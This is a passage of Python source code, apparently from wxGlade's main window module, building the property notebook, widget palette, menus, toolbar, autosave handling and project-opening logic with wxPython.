if edit_widget is not self.next_widget:
# wait for another call...
return
if self._notebook_decoration_size is None:
# try again later
wx.CallLater( 150, self.edit_properties, edit_widget )
return
self.current_widget = None
self.create_editor(edit_widget)
# this code might not be reached in case of an error
self.current_widget = edit_widget
if edit_widget:
# XXX set status bar
klass = edit_widget.get_prop_value("class", edit_widget.WX_CLASS)
self.heading.SetValue( _('Properties - %s - <%s>:') % (klass, edit_widget.name) )
else:
self.heading.SetValue( _('Properties') )
def create_editor(self, edit_widget):
# fill the frame with a notebook of property editors
if not self.notebook: return # already deleted
self.current_widget_class = edit_widget.__class__
if wx.Platform != "__WXMSW__" :
focus_before = self.FindFocus()
self.notebook.Hide()
# remember the notebook page to be selected
selection = self.notebook.GetSelection()
select_page = self.pagenames[selection] if selection!=-1 else None
# clear notebook pages
#self.notebook.DeleteAllPages() # deletes also the windows on the pages
while self.notebook.PageCount:
print("DELETE PAGE; new widget:", edit_widget)
self.notebook.DeletePage(self.notebook.PageCount-1)
self.pagenames = pagenames = []
self.sizers = []
if not edit_widget: return
current_page = current_sizer = current_pagename = None
property_instance = None
for prop in edit_widget.PROPERTIES:
if prop[0].isupper():
# end previous page
if current_page is not None:
self.end_page(current_page, current_sizer, current_pagename)
current_page = None
# start new page
current_pagename = prop
if prop=="Layout" and not edit_widget._has_layout:continue
if prop=="Events" and edit_widget.events is None: continue
current_page = self.start_page(prop)
current_sizer = wx.BoxSizer(wx.VERTICAL)
self.sizers.append(current_sizer)
self.pagenames.append(prop)
continue
if current_pagename=="Layout" and not edit_widget._has_layout: continue
# a property or None
property_instance_ = edit_widget.properties.get(prop)
if property_instance_ is not None:
property_instance = property_instance_
property_instance.create_editor(current_page, current_sizer)
if current_page is not None:
self.end_page(current_page, current_sizer, current_pagename)
if select_page and select_page in pagenames:
index = pagenames.index(select_page)
self.notebook.SetSelection(index)
else:
self.notebook.SetSelection(0)
self.notebook.Show()
if wx.Platform != "__WXMSW__" and focus_before is common.app_tree:
focus_before.SetFocus()
def start_page(self, name):
# create a ScrolledWindow and a Panel; with only ScrolledWindow, scrolling on gtk 3 does not work
scrolled = wx.ScrolledWindow( self.notebook, name=name)
panel = wx.Panel(scrolled, name="%s properties"%name)
if wx.VERSION[0]<3:
panel.SetBackgroundColour(scrolled.GetBackgroundColour())
return panel
def end_page(self, panel, sizer, header, select=False):
sizer.AddSpacer(30)
panel.SetAutoLayout(1)
panel.SetSizer(sizer)
sizer.Layout()
sizer.Fit(panel)
scrolled = panel.GetParent()
self.notebook.AddPage(scrolled, _(header),select=select)
self._set_page_size(scrolled)
def _set_page_size(self, scrolled):
# set ScrolledWindow and Panel to available size; enable scrolling, if required
# gets available size for notebook pages
ws, hs = self.notebook.GetSize()
ws -= self._notebook_decoration_size[0]
hs -= self._notebook_decoration_size[1]
w_scrollbar = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X) # width a of a scrollbar
panel = [w for w in scrolled.GetChildren() if isinstance(w, wx.Panel)][0]
szr = panel.GetSizer()
if not szr: return
wm, hm = szr.GetMinSize()
if hs<hm:
# best size is smaller than the available height -> enable scrolling
scrolled.SetScrollbars(1, 5, 1, int(math.ceil(hm/5.0)))
panel.SetSize( (ws-w_scrollbar, hm) )
else:
panel.SetSize( (ws, hs) )
def on_notebook_size(self, event):
# calculate available size for pages
if self._notebook_decoration_size:
for scrolled in self.notebook.GetChildren():
self._set_page_size(scrolled)
if event: event.Skip()
def on_panel_size(self, event):
# when the dummy panel receives a size event, we know that things are ready to calculate the notebook pages size
# calculate decoration size from the dummy panel that was added initially
if event.GetSize() != (0,0):
wp, hp = self.notebook.GetPage(0).GetSize() # page/panel size
wn, hn = self.notebook.GetSize() # notebook size
self._notebook_decoration_size = (wn-wp, hn-hp)
self.notebook.DeletePage(0)
else:
# Mac OS: inital event on creation
event.Skip()
# don't use any more for application; causes crashes on Cent OS 7; still used when testing
class wxGladeArtProvider(wx.ArtProvider):
def CreateBitmap(self, artid, client, size):
if wx.Platform == '__WXGTK__' and artid == wx.ART_FOLDER:
return wx.Bitmap(os.path.join(config.icons_path, 'closed_folder.png'))
return wx.NullBitmap
class wxGladePalettePanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
common.palette = self # for building the buttons
self.SetBackgroundColour( compat.wx_SystemSettings_GetColour(wx.SYS_COLOUR_BTNFACE) )
# load the available code generators
all_widgets = common.init_codegen()
if not config.use_gui: return
self.all_togglebuttons = [] # used by reset_togglebuttons
# for keyboard navigation:
self._id_to_coordinate = {}
self._ids_by_row = []
self._section_to_row = {}
# build the palette for all_widgets
sizer = wx.FlexGridSizer(0, 2, 0, 0)
maxlen = max([len(all_widgets[sect]) for sect in all_widgets]) # the maximum number of buttons in a section
for row, section in enumerate(all_widgets):
self._section_to_row[section] = row
self._ids_by_row.append([])
if section:
label = wx.StaticText(self, -1, "%s:" % section.replace('&', '&&'))
sizer.Add( label, 1, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 2 )
bsizer = wx.BoxSizer()
for col, button in enumerate(all_widgets[section]):
self._ids_by_row[-1].append(button.Id)
self._id_to_coordinate[button.Id] = (row,col)
bsizer.Add(button, flag=wx.ALL, border=1)
if isinstance(button, wx.ToggleButton):
self.all_togglebuttons.append(button)
sizer.Add(bsizer)
self.SetSizer(sizer)
# on platforms other than Windows, we'll set the ToggleButton background colour to indicate the selection
if wx.Platform == "__WXMSW__":
self._highlight_colour = None
else:
self._highlight_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT)
self.Bind(wx.EVT_CHAR_HOOK, self.on_char)
def reset_togglebuttons(self, keep=None):
# un-toggle all buttons except keep
for button in self.all_togglebuttons:
if keep is not None and button is keep:
if self._highlight_colour:
button.SetBackgroundColour(self._highlight_colour)
continue
if self._highlight_colour and button.GetBackgroundColour()==self._highlight_colour:
button.SetBackgroundColour(wx.NullColour)
if button.GetValue(): button.SetValue(False)
def on_char(self, event):
key = (event.GetKeyCode(), event.GetModifiers()) # modifiers: 1,2,4 for Alt, Ctrl, Shift
if key[1]: return event.Skip()
focused = self.FindFocus()
if not focused or not focused.Id in self._id_to_coordinate:
return event.Skip()
row, col = self._id_to_coordinate[focused.Id]
new_row = new_col = None
if key[0]==wx.WXK_UP:
if row>0: new_row = row-1
elif key[0]==wx.WXK_DOWN:
if row < len(self._ids_by_row)-1: new_row = row+1
elif key[0]==wx.WXK_LEFT:
if col>0: new_col = col-1
elif key[0]==wx.WXK_RIGHT:
if col < len(self._ids_by_row[row])-1: new_col = col+1
elif key[0]==wx.WXK_HOME:
new_col = 0
elif key[0]==wx.WXK_END:
new_col = len(self._ids_by_row[row])-1
elif key[0]==wx.WXK_PAGEUP:
new_row = 0
elif key[0]==wx.WXK_PAGEDOWN:
new_row = len(self._ids_by_row)-1
elif (ord("A") <= key[0] <= ord("Z")) and chr(key[0]) in misc.palette_hotkeys:
section = misc.palette_hotkeys[chr(key[0])]
new_row = self._section_to_row[section]
new_col = 0
else:
return event.Skip()
if new_row is None and new_col is None:
# limits hit
wx.Bell()
else:
if new_col is None: new_col = min(col, len(self._ids_by_row[new_row])-1)
if new_row is None: new_row = row
focus = self.FindWindowById(self._ids_by_row[new_row][new_col])
if focus: focus.SetFocus()
import shell_frame
class ShellFrame(shell_frame.ShellFrame):
def on_btn_assign(self, event):
# insert a variable assignment
widget = misc.focused_widget
if not widget:
event.Skip()
return
path = widget.get_path()
command = 'widget = common.root.find_widget_from_path("%s")\r\n'%path
#self.shell.push(command) # or .write ?
self.shell.write(command)
class wxGladeFrame(wx.Frame):
"Main frame of wxGlade"
def __init__(self):
version = config.version
pos, size, layout = self.init_layout_settings()
wx.Frame.__init__(self, None, -1, "wxGlade v%s" % version, pos=pos, size=size,
style=wx.DEFAULT_FRAME_STYLE, name='MainFrame')
common.main = self
self._set_icon()
self.create_menu()
self.create_toolbar()
style = wx.SP_3D | wx.SP_LIVE_UPDATE
self.splitter1 = wx.SplitterWindow(self, style=style)
self.splitter2 = wx.SplitterWindow(self.splitter1, style=style)
self.palette = wxGladePalettePanel(self.splitter2)
# create the property and the tree frame
common.property_panel = self.property_panel = wxGladePropertyPanel(self.splitter2)
common.root = app = application.Application()
common.app_tree = self.tree = WidgetTree(self.splitter1, app)
self.splitter1.SplitVertically(self.splitter2, self.tree)
self.splitter2.SplitHorizontally(self.palette, self.property_panel)
self.switch_layout(layout, initial=True)
# last visited directory, used on GTK for wxFileDialog
self.cur_dir = config.preferences.open_save_path
# set a drop target for us...
self._droptarget = FileDropTarget(self)
self.SetDropTarget(self._droptarget)
self.create_statusbar() # create statusbar for display of messages
self.Show()
#misc.set_focused_widget(common.root)
self.Bind(wx.EVT_CLOSE, self.on_close)
# disable autosave checks during unittests
if config.testing: return
self.init_autosave()
self.check_autosaved()
self.Bind(wx.EVT_CHAR_HOOK, self.on_char_hook)
if config.debugging:
self.splitter1.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.on_sash)
self.splitter2.Bind(wx.EVT_SPLITTER_SASH_POS_CHANGED, self.on_sash)
def on_sash(self, event):
# XXX not yet used, but it could be used to re-format the palette panel
layout = self.layout_settings["layout"]
if layout==0:
size = (self.splitter1.GetSashPosition(), self.splitter2.GetSashPosition())
elif layout==1:
size = (self.splitter2.GetSashPosition(), self.splitter1.GetSashPosition())
elif layout==2:
size = (self.GetClientSize()[0], self.splitter2.GetSashPosition())
def on_char_hook(self, event):
# bound to EVT_CHAR_HOOK
focus = parent = self.FindFocus()
grid = None # will be set if a grid or a grid's child is focused
window_type = None
while parent:
# go up and identify parent: Palette, Property or Tree
if isinstance(parent, wx.grid.Grid):
grid = parent
if parent is self.palette:
window_type = "palette"
elif parent is self.tree:
window_type = "tree"
elif parent is self.property_panel:
window_type = "properties"
if window_type: break
parent = parent.GetParent()
# forward to specific controls / properties? (on wx 2.8 installing EVT_CHAR_HOOK on controls does not work)
if window_type=="properties" and grid and grid.Name!="grid":
# forward event to grid property?
if misc.focused_widget.properties[grid.Name].on_char(event):
return
if window_type=="tree":
if common.app_tree.on_char(event):
return
# global handler
misc.handle_key_event(event, window_type)
def set_widget(self, widget):
# update redo/repeat tools and menus
if not common.history: return
redo_state = (common.history.can_undo, common.history.can_redo, common.history.can_repeat)
if self._previous_redo_state == redo_state:
return
self._menu_undo.Enable(common.history.can_undo)
self._menu_redo.Enable(common.history.can_redo)
self._menu_repeat.Enable(common.history.can_repeat)
if self._tool_redo:
self._tool_undo.Enable(common.history.can_undo)
self._tool_redo.Enable(common.history.can_redo)
self._tool_repeat.Enable(common.history.can_repeat)
self.toolbar.Realize()
self._previous_redo_state = redo_state
# menu and actions #################################################################################################
def create_menu(self):
self._previous_redo_state = None
menu_bar = wx.MenuBar()
compat.wx_ToolTip_SetDelay(1000)
compat.wx_ToolTip_SetAutoPop(30000)
append_menu_item = misc.append_menu_item
# File menu
file_menu = wx.Menu(style=wx.MENU_TEAROFF)
NEW = append_menu_item(file_menu, -1, _("&New\tCtrl+N"), wx.ART_NEW)
misc.bind_menu_item(self, NEW, self.new_app)
item = append_menu_item(file_menu, -1, _("New from &Template...\tShift+Ctrl+N"))
misc.bind_menu_item(self, item, self.new_app_from_template)
OPEN = append_menu_item(file_menu, -1, _("&Open...\tCtrl+O"), wx.ART_FILE_OPEN)
misc.bind_menu_item(self, OPEN, self.open_app)
SAVE = append_menu_item(file_menu, -1, _("&Save\tCtrl+S"), wx.ART_FILE_SAVE)
misc.bind_menu_item(self, SAVE, self.save_app)
SAVE_AS = append_menu_item(file_menu, -1, _("Save As..."), wx.ART_FILE_SAVE_AS)
misc.bind_menu_item(self, SAVE_AS, self.save_app_as)
item = append_menu_item(file_menu, -1, _("Save As Template..."))
misc.bind_menu_item(self, item, self.save_app_as_template)
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
GENERATE_CODE = append_menu_item(file_menu, -1, _("&Generate Code\tCtrl+G"), wx.ART_EXECUTABLE_FILE)
misc.bind_menu_item(self, GENERATE_CODE, lambda: common.root.generate_code())
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(file_menu, -1, _("&Import from XRC..."))
misc.bind_menu_item(self, item, self.import_xrc)
file_menu.AppendSeparator() # ----------------------------------------------------------------------------------
EXIT = append_menu_item(file_menu, -1, _('E&xit\tCtrl+Q'), wx.ART_QUIT)
misc.bind_menu_item(self, EXIT, self.Close)
menu_bar.Append(file_menu, _("&File"))
# Edit menu ====================================================================================================
edit_menu = wx.Menu(style=wx.MENU_TEAROFF)
# these menu items will be updated
self._menu_undo = item = append_menu_item(edit_menu, -1, _('Un-do\tCtrl+Z'),
helpString="Un-do the last property modification on another widget")
misc.bind_menu_item(self, item, lambda: common.history.undo(misc.focused_widget))
self._menu_redo = item = append_menu_item(edit_menu, -1, _('Re-do\tCtrl+Y'),
helpString="Re-do the last property modification on another widget")
misc.bind_menu_item(self, item, lambda: common.history.repeat(misc.focused_widget))
self._menu_repeat = item = append_menu_item(edit_menu, -1, _('Repeat\tCtrl-R'),
helpString="Repeat the last property modifications on another widget (multiple modifications, if applicable)")
misc.bind_menu_item(self, item, lambda: common.history.repeat(misc.focused_widget))
edit_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(edit_menu, -1, _('Template Manager...'))
misc.bind_menu_item(self, item, self.manage_templates)
item = append_menu_item(edit_menu, wx.ID_PREFERENCES, _('Preferences...'), "prefs.png")
misc.bind_menu_item(self, item, self.edit_preferences)
menu_bar.Append(edit_menu, _("&Edit"))
# Windows menu: layout and focus ===============================================================================
view_menu = wx.Menu(style=wx.MENU_TEAROFF)
i = append_menu_item(view_menu, -1, _("Layout &1: Tree\tAlt-1"), "../layout1.png")
misc.bind_menu_item(self, i, self.switch_layout, 0)
i = append_menu_item(view_menu, -1, _("Layout &2: Properties\tAlt-2"), "../layout2.png")
misc.bind_menu_item(self, i, self.switch_layout, 1)
i = append_menu_item(view_menu, -1, _("Layout &3: Narrow\tAlt-3"), "../layout3.png")
misc.bind_menu_item(self, i, self.switch_layout, 2)
view_menu.AppendSeparator()
i = append_menu_item(view_menu, -1, _("Focus &Tree\tF2"))
misc.bind_menu_item(self, i, self.show_tree)
i = append_menu_item(view_menu, -1, _("Focus &Properties\tF3"))
misc.bind_menu_item(self, i, self.show_props_window )
i = append_menu_item(view_menu, -1, _("Focus Pa&lette\tF4"))
misc.bind_menu_item(self, i, self.show_palette )
# submenu focus sections >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
view_props_menu = wx.Menu()
# randomly select set of shortcuts to be displayed:
if int(math.ceil(time.time())) % 2:
shortcuts = ["F8", "F9", "F10", "F11", "F12"]
else:
shortcuts = ["Ctrl-M", "Ctrl-L", "Ctrl-W", "Ctrl-E", "Ctrl-D"]
for sc, section in zip(shortcuts, ("Common", "Layout", "Widget", "Events", "Code")):
i = append_menu_item(view_props_menu, -1, _("Focus &%s\t%s"%(section, sc)))
misc.bind_menu_item(self, i, self.show_props_window, section)
view_menu.AppendSubMenu(view_props_menu, _("Focus Properties &Section"))
view_menu.AppendSeparator() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
i = append_menu_item(view_menu, -1, _("Show/Hide &Design\tF6"))
misc.bind_menu_item(self, i, self.show_design_window)
self._m_pin_design_window = i = append_menu_item(view_menu, -1, _("&Pin &Design\tCtrl-P"), kind=wx.ITEM_CHECK)
misc.bind_menu_item(self, i, self.pin_design_window)
view_menu.AppendSeparator() # ----------------------------------------------------------------------------------
item = append_menu_item(view_menu, wx.ID_REFRESH, _("&Refresh Preview\tF5"), "refresh.png")
misc.bind_menu_item(self, item, self.preview)
menu_bar.Append(view_menu, _("&Windows"))
# Help menu ====================================================================================================
help_menu = wx.Menu(style=wx.MENU_TEAROFF)
MANUAL = append_menu_item(help_menu, -1, _('Manual\tF1'), wx.ART_HELP_BOOK)
misc.bind_menu_item(self, MANUAL, self.show_manual)
#item = append_menu_item(help_menu, -1, _('Tutorial'))
#misc.bind_menu_item(self, item, self.show_tutorial)
help_menu.AppendSeparator() # ----------------------------------------------------------------------------------
i = append_menu_item(help_menu, -1, _('Mailing list'))
misc.bind_menu_item(self, i, self.show_mailing_list)
i = append_menu_item(help_menu, -1, _('Bug tracker'))
misc.bind_menu_item(self, i, self.show_bug_tracker)
i = append_menu_item(help_menu, -1, _('Releases'))
misc.bind_menu_item(self, i, self.show_releases)
help_menu.AppendSeparator() # ----------------------------------------------------------------------------------
if config.debugging:
i = append_menu_item(help_menu, -1, 'Shell\tF7')
misc.bind_menu_item(self, i, self.create_shell_window)
help_menu.AppendSeparator()
item = append_menu_item(help_menu, wx.ID_ABOUT, _('About'), wx.ART_INFORMATION)
misc.bind_menu_item(self, item, self.show_about_box)
menu_bar.Append(help_menu, _('&Help'))
self.SetMenuBar(menu_bar)
# Mac tweaks...
if wx.Platform == "__WXMAC__":
if compat.IS_PHOENIX:
wx.PyApp.SetMacAboutMenuItemId(wx.ID_ABOUT)
wx.PyApp.SetMacPreferencesMenuItemId(wx.ID_PREFERENCES)
wx.PyApp.SetMacExitMenuItemId(wx.ID_EXIT)
wx.PyApp.SetMacHelpMenuTitleName(_('&Help'))
else:
wx.App_SetMacAboutMenuItemId(wx.ID_ABOUT)
wx.App_SetMacPreferencesMenuItemId(wx.ID_PREFERENCES)
wx.App_SetMacExitMenuItemId(wx.ID_EXIT)
wx.App_SetMacHelpMenuTitleName(_('&Help'))
# file history support
num_entries = config.preferences.number_history
self.file_history = wx.FileHistory(num_entries)
self.file_history.UseMenu(file_menu)
files = common.load_file_history()
files.reverse()
for path in files:
self.file_history.AddFileToHistory(path.strip())
self.Bind(wx.EVT_MENU_RANGE, self.open_from_history, id=wx.ID_FILE1, id2=wx.ID_FILE1+num_entries-1)
def _add_label_tool(self, tb, size, id, label, bmp, itemtype, msg, msg_long=None):
ADD = tb.AddLabelTool if compat.IS_CLASSIC else tb.AddTool
if compat.IS_PHOENIX:
method = getattr(tb, "AddTool")
else:
method = getattr(tb, "AddLabelTool")
if isinstance(bmp, str) and not bmp.startswith("wxART_"):
bmp = wx.Bitmap( os.path.join(config.icons_path, bmp) )
else:
# a wx.ART_... constant
bmp = wx.ArtProvider.GetBitmap(bmp, wx.ART_TOOLBAR, size)
return ADD(-1, _(label), bmp, wx.NullBitmap, itemtype, _(msg), _(msg_long or msg))
def create_toolbar(self):
# new, open, save, generate, add, delete, re-do, Layout 1, 2, 3, pin, help
# insert slot/page?
# Layout: Alt + 1,2,3
self.toolbar = tb = wx.ToolBar(self, -1)
self.SetToolBar(tb)
size = (21,21)
add = functools.partial(self._add_label_tool, tb, size)
t = add( wx.ID_NEW, "New", wx.ART_NEW, wx.ITEM_NORMAL, "Start a new file (Ctrl+N)")
self.Bind(wx.EVT_TOOL, self.new_app, t)
t = add( wx.ID_OPEN, "Open", wx.ART_FILE_OPEN, wx.ITEM_NORMAL, "Open an existing file (Ctrl+O)")
self.Bind(wx.EVT_TOOL, self.open_app, t)
t = add( wx.ID_SAVE, "Save", wx.ART_FILE_SAVE, wx.ITEM_NORMAL, "Save file (Ctrl+S)")
self.Bind(wx.EVT_TOOL, self.save_app, t)
if config.debugging and hasattr(wx, "ART_PLUS"):
t = add( -1, "Add", wx.ART_PLUS, wx.ITEM_NORMAL, "Add widget (Ctrl+A)")
t.Enable(False)
# XXX switch between wx.ART_DELETE for filled slots and wx.ART_MINUS for empty slots
t = add( -1, "Remove", wx.ART_MINUS, wx.ITEM_NORMAL, "Add widget (Ctrl+A)")
t.Enable(False)
tb.AddSeparator()
self._tool_undo = t = add( wx.ID_UNDO, "Un-do", wx.ART_UNDO, wx.ITEM_NORMAL, "Un-do (Ctrl+Z)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.undo(misc.focused_widget), t)
self._tool_redo = t = add( wx.ID_REDO, "Re-do", wx.ART_REDO, wx.ITEM_NORMAL, "Re-do (Ctrl+Y)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.redo(misc.focused_widget), t)
self._tool_repeat = t = add( -1, "Repeat", wx.ART_REDO, wx.ITEM_NORMAL, "Repeat (Ctrl+R)" )
t.Enable(False)
self.Bind(wx.EVT_TOOL, lambda evt: common.history.repeat(misc.focused_widget), t)
tb.AddSeparator()
t = add(-1, "Generate Code", wx.ART_EXECUTABLE_FILE, wx.ITEM_NORMAL, "Generate Code (Ctrl+G)" )
self.Bind(wx.EVT_TOOL, lambda event: common.root.generate_code(), t)
tb.AddSeparator()
t1 = add(-1, "Layout 1", "layout1.png", wx.ITEM_RADIO, "Switch layout: Tree",
"Switch layout: Palette and Properties left, Tree right")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(0), t1)
t2 = add(-1, "Layout 2", "layout2.png", wx.ITEM_RADIO,"Switch layout: Properties",
"Switch layout: Palette and Tree top, Properties bottom")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(1), t2)
t3 = add(-1, "Layout 3", "layout3.png", wx.ITEM_RADIO, "Switch layout: narrow",
"Switch layout: Palette, Tree and Properties on top of each other")
self.Bind(wx.EVT_TOOL, lambda event: self.switch_layout(2), t3)
self._layout_tools = [t1,t2,t3]
tb.AddSeparator()
t = add(-1, "Pin Design Window", "pin_design.png", wx.ITEM_CHECK, "Pin Design Window",
"Pin Design Window to stay on top")
self.Bind(wx.EVT_TOOL, lambda event: self.pin_design_window(), t)
self._t_pin_design_window = t
tb.AddSeparator()
t = add(wx.ID_HELP, "Help", wx.ART_HELP_BOOK, wx.ITEM_NORMAL, "Show manual (F1)")
self.Bind(wx.EVT_TOOL, self.show_manual, t)
self.toolbar.Realize()
def init_autosave(self):
# ALB 2004-10-15, autosave support...
self.autosave_timer = None
if not config.preferences.autosave: return
self.autosave_timer = wx.Timer(self, -1)
self.Bind(wx.EVT_TIMER, self.on_autosave_timer, self.autosave_timer)
self.autosave_timer.Start( int(config.preferences.autosave_delay) * 1000 )
def on_autosave_timer(self, event):
res = common.autosave_current()
if res == 2:
self.user_message(_("Auto saving... done"))
elif not res:
self.autosave_timer.Stop()
config.preferences.autosave = False
logging.info(_('Disable autosave function permanently'))
wx.MessageBox(
_('The autosave function failed. It has been disabled\n'
'permanently due to this error. Use the preferences\n'
'dialog to re-enable this functionality.\n'
'The details have been written to the wxGlade log file\n\n'
'The log file is: %s' % config.log_file ),
_('Autosave Failed'), wx.OK | wx.CENTRE | wx.ICON_ERROR )
def check_autosaved(self):
if not common.check_autosaved(None): return
res = wx.MessageBox(
_('There seems to be auto saved data from last wxGlade session: do you want to restore it?'),
_('Auto save detected'), style=wx.ICON_QUESTION | wx.YES_NO)
if res == wx.YES:
filename = common.get_name_for_autosave()
if self._open_app(filename, add_to_history=False):
self.cur_dir = os.path.dirname(filename)
common.root.saved = False
common.root.filename = None
self.user_message(_('Auto save loaded'))
common.remove_autosaved()
def edit_preferences(self):
dialog = preferencesdialog.wxGladePreferences(config.preferences)
if dialog.ShowModal() == wx.ID_OK:
wx.MessageBox( _('Changes will take effect after wxGlade is restarted'),
_('Preferences saved'), wx.OK|wx.CENTRE|wx.ICON_INFORMATION )
dialog.set_preferences()
else:
dialog.canceled()
dialog.Destroy()
def _get_toplevel(self):
# return the toplevel for a preview or design window
if misc.focused_widget and not isinstance(misc.focused_widget, application.Application):
# a widget is selected, find the toplevel window for it
return misc.focused_widget.toplevel_parent
# find main toplevel window
return common.root._get_top_window()
def preview(self):
"""Generate preview of the current loaded project.
A preview can be triggered by keyboard shortcut or by pressing the preview button.
The preview can be triggered for all selected widgets.
This doesn't mean that the widget is opened for editing."""
toplevel = self._get_toplevel()
if toplevel is not None:
toplevel.preview(refresh=True)
def show_palette(self):
if self.IsIconized(): self.Iconize(False)
self.palette.SetFocus()
def show_tree(self):
if self.IsIconized(): self.Iconize(False)
common.app_tree.SetFocus()
def show_props_window(self, section=None):
# XXX implement: if a section is active already, then go to first property of the page
if not self.property_panel.notebook: return
if self.IsIconized(): self.Iconize(False)
self.property_panel.pagenames
if not section:
self.property_panel.notebook.SetFocus()
else:
if not section in self.property_panel.pagenames:
return
i = self.property_panel.pagenames.index(section)
if self.property_panel.notebook.GetSelection() != i:
self.property_panel.notebook.ChangeSelection(i)
else:
self.property_panel.notebook.SetFocus()
# try to set the focus if the widget has changed; this is not yet implemented for many property types
widget = self.property_panel.current_widget
if ( widget and (widget is not np.current_property.owner) and
section in widget.PROPERTIES ):
i_p = widget.PROPERTIES.index(section) + 1
if i_p<len(widget.PROPERTIES):
prop = widget.properties.get(widget.PROPERTIES[i_p])
if prop: prop.set_focus()
self.Raise()
def show_design_window(self):
toplevel = self._get_toplevel()
if not toplevel: return
if toplevel.widget:
focus = toplevel.widget.FindFocus()
focused = focus and focus.GetTopLevelParent() is toplevel.widget.GetTopLevelParent()
if toplevel.widget and toplevel.widget.IsShownOnScreen() and not focused:
# just raise it
if toplevel.widget.GetTopLevelParent().IsIconized():
toplevel.widget.GetTopLevelParent().Iconize(False)
toplevel.widget.GetTopLevelParent().Raise()
return
# open or close
common.app_tree.show_toplevel(None, editor=toplevel)
def pin_design_window(self):
common.pin_design_window = not common.pin_design_window
if common.pin_design_window != self._t_pin_design_window.IsToggled():
self._t_pin_design_window.Toggle()
self.toolbar.Realize()
self._m_pin_design_window.Check(common.pin_design_window)
toplevel = self._get_toplevel()
if not toplevel or not toplevel.widget: return
frame = toplevel.widget.GetTopLevelParent()
if not isinstance(frame, wx.Frame): return
style = frame.GetWindowStyle()
if common.pin_design_window:
frame.SetWindowStyle( style | wx.STAY_ON_TOP)
elif style & wx.STAY_ON_TOP:
frame.ToggleWindowStyle(wx.STAY_ON_TOP)
if wx.Platform=='__WXMSW__':
frame.Iconize(True)
frame.Iconize(False)
else:
toplevel.widget.Raise()
def create_shell_window(self):
common.shell = ShellFrame(None)
if misc.focused_widget: common.shell.txt_path.SetValue( misc.focused_widget.get_path() )
common.shell.Show()
# status bar for message display ###################################################################################
def create_statusbar(self):
self.CreateStatusBar(1)
# ALB 2004-10-15 statusbar timer: delete user message after some time
self.clear_sb_timer = wx.Timer(self, -1)
self.Bind(wx.EVT_TIMER, self.on_clear_sb_timer, self.clear_sb_timer)
def user_message(self, msg):
# display a message, but clear it after a few seconds again
sb = self.GetStatusBar()
if sb:
sb.SetStatusText(msg)
if msg:
self.clear_sb_timer.Start(5000, True)
def on_clear_sb_timer(self, event):
sb = self.GetStatusBar()
if sb: sb.SetStatusText("")
####################################################################################################################
def ask_save(self):
"""checks whether the current app has changed and needs to be saved:
if so, prompts the user;
returns False if the operation has been cancelled"""
if not common.root.saved:
ok = wx.MessageBox(_("Save changes to the current app?"),
_("Confirm"), wx.YES_NO|wx.CANCEL|wx.CENTRE|wx.ICON_QUESTION)
if ok == wx.YES:
self.save_app()
return ok != wx.CANCEL
return True
def new_app(self, event=None):
"creates a new wxGlade project"
if not self.ask_save(): return
common.root.clear()
common.root.new()
common.root.filename = None
self.user_message("")
misc.rebuild_tree(common.root)
common.root.saved = True
common.remove_autosaved()
if common.history: common.history.reset()
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
def new_app_from_template(self):
"creates a new wxGlade project from an existing template file"
if not self.ask_save(): return
infile = template.select_template()
if infile:
self._open_app(infile, add_to_history=False)
common.root.template_data = None
def open_app(self, event=None):
"""loads a wxGlade project from an xml file
NOTE: this is very slow and needs optimisation efforts
NOTE2: the note above should not be True anymore :) """
if not self.ask_save():
return
default_path = os.path.dirname(common.root.filename or "") or self.cur_dir
infile = wx.FileSelector(_("Open file"),
wildcard="wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt)|*.wgt|"
"XML files (*.xml)|*.xml|All files|*",
flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=default_path)
if not infile: return
self._open(infile)
def open_from_history(self, event):
if not self.ask_save():
return
pos = event.GetId() - wx.ID_FILE1
filename = self.file_history.GetHistoryFile(pos)
if not os.path.exists(filename):
wx.MessageBox( _("The file %s doesn't exist.") % filename,
_('Information'), style=wx.CENTER | wx.ICON_INFORMATION | wx.OK )
self.file_history.RemoveFileFromHistory(pos)
common.remove_autosaved(filename)
return
self._open(filename)
def _open(self, filename):
# called by open_app and open_from_history
if common.check_autosaved(filename):
res = wx.MessageBox( _('There seems to be auto saved data for this file: do you want to restore it?'),
_('Auto save detected'), style=wx.ICON_QUESTION | wx.YES_NO )
if res == wx.YES:
common.restore_from_autosaved(filename)
else:
common.remove_autosaved(filename)
else:
common.remove_autosaved(filename)
path = position = None
if filename == common.root.filename:
# if we are re-loading the file, store path and position
if misc.focused_widget:
path = misc.focused_widget.get_path()
if misc.focused_widget.widget is not None and not misc.focused_widget.IS_ROOT:
toplevel = misc.get_toplevel_parent(misc.focused_widget.widget)
if toplevel: position = toplevel.GetPosition()
self._open_app(filename)
self.cur_dir = os.path.dirname(filename)
if not path: return
editor = common.root.find_widget_from_path(path)
if not editor: return
misc.set_focused_widget(editor)
if editor is common.root: return
editor.toplevel_parent.create()
common.app_tree.ExpandAllChildren(editor.item)
if not position or not editor.widget: return
misc.get_toplevel_parent(editor.widget).SetPosition(position)
def _open_app(self, filename, use_progress_dialog=True, add_to_history=True):
"Load a new wxGlade project"
error_msg = None
infile = None
start = time.time()
common.root.clear()
common.root.init()
common.app_tree.DeleteChildren(common.root.item)
common.app_tree.auto_expand = False # disable auto-expansion of nodes
try:
try:
logging.info( _('Read wxGlade project from file "%s"'), filename )
input_file_version = None
if not isinstance(filename, list):
